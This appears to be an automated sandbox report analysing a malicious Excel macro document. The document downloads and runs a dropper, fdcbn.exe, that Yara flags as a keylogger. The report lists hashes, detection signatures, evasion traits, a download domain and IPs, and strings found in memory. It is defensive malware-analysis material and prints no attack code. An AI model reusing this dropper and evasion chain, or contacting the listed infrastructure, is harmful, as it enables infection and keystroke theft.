Play interactive tour

Edit tour

Analysis Report request_form_1611565093.xlsm

Overview

General Information

Sample Name:	request_form_1611565093.xlsm
Analysis ID:	343657
MD5:	9c47eef4c66e4587ecddb55cfc3ef1e6
SHA1:	da444ad39f513282d1918beceadc0ceb6edc0d3d
SHA256:	042b7d9208258a1a64b9a1ab0079e1bb7898a3b787167457951b810e9b126dd1
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Checks for available system drives (often done to infect USB drives)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Excel documents contains an embedded macro which executes code when the document is opened

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 4640 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

fdcbn.exe (PID: 4872 cmdline: 'C:\otrgh\sdgvjk\fdcbn.exe' MD5: DC74FAE0ADA0A2426E77588E3797E040)

fdcbn.exe (PID: 5384 cmdline: 'C:\otrgh\sdgvjk\fdcbn.exe' MD5: DC74FAE0ADA0A2426E77588E3797E040)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: fdcbn.exe PID: 4872	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: fdcbn.exe PID: 5384	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 50.87.232.245:443 -> 192.168.2.3:49722 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: kernel32.pdbUGP source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
Source:	Binary string: dnsapi.pdbUGP source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
Source:	Binary string: wininet.pdb source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
Source:	Binary string: ws2_32.pdb source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7`d source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp, 9ght3erd[1].exe.0.dr
Source:	Binary string: Dw=helpvolumelabelmasteredudfUDFJOLIETItemPosItemOrder%s (%d).%sData\Program Files\Data\Windows\Program Files\Data\Program Files (x86)\Data\ProgramData\.cdxml.cer.automaticdestinations-ms.cat.dmp.cookie.customdestinations-msWindows\$Windows.~BT\Program Files (x86)\ProgramData\.appxbundle.appxpackageWindows.old\.appx.msip.msm.ocx.olb.mui.nst.etl.fon.dsft.efi.mpb.mp.partial.pdb.p7s.p7x.pfx.pem.pfm.p10.p12.ost.otf.p7m.p7r.p7b.p7c.sys.ttc.spkg.sst.vmrs.vsi.vmcx.psd1.psf.sft.spc.rll.wim.winmd.vsix.wfsWININET.xap\shellL source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
Source:	Binary string: ole32.pdbUGP source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7 source: 9ght3erd[1].exe.0.dr
Source:	Binary string: ole32.pdb source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
Source:	Binary string: advapi32.pdb source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
Source:	Binary string: shell32.pdb source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: user32.pdb source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
Source:	Binary string: crypt32.pdbUGP source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp
Source:	Binary string: advapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
Source:	Binary string: netapi32.pdb source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
Source:	Binary string: netapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
Source:	Binary string: kernel32.pdb source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
Source:	Binary string: user32.pdbUGP source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
Source:	Binary string: wininet.pdbUGP source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
Source:	Binary string: ws2_32.pdbUGP source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
Source:	Binary string: bcrypt.pdbUGP source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
Source:	Binary string: shell32.pdbUGP source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: crypt32.pdb source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp

Spreading:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: z:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: x:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: v:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: t:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: r:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: p:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: n:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: l:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: j:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: h:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: f:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: b:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: y:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: w:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: u:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: s:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: q:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: o:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: m:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: k:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: i:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: g:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: e:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: c:	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File opened: a:	Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\otrgh\sdgvjk\fdcbn.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exe	Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: 9ght3erd[1].exe.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\otrgh\sdgvjk\fdcbn.exe

Jump to behavior

Source: global traffic

DNS query: name: japort.com

Source: global traffic

TCP traffic: 192.168.2.3:49722 -> 50.87.232.245:443

Source: global traffic

TCP traffic: 192.168.2.3:49722 -> 50.87.232.245:443

Networking:

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.19.60.159
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198
Source: unknown	TCP traffic detected without corresponding DNS query: 3.14.70.198

Source: unknown

DNS traffic detected: queries for: japort.com

Source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	String found in binary or memory: http://.css
Source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	String found in binary or memory: http://.jpg
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enRootDirUrlSoftware
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
Source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.ncdc.gov.sa0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://ocsp.suscerte.gob.ve0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://pki.registradores.org/normativa/index.htm0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
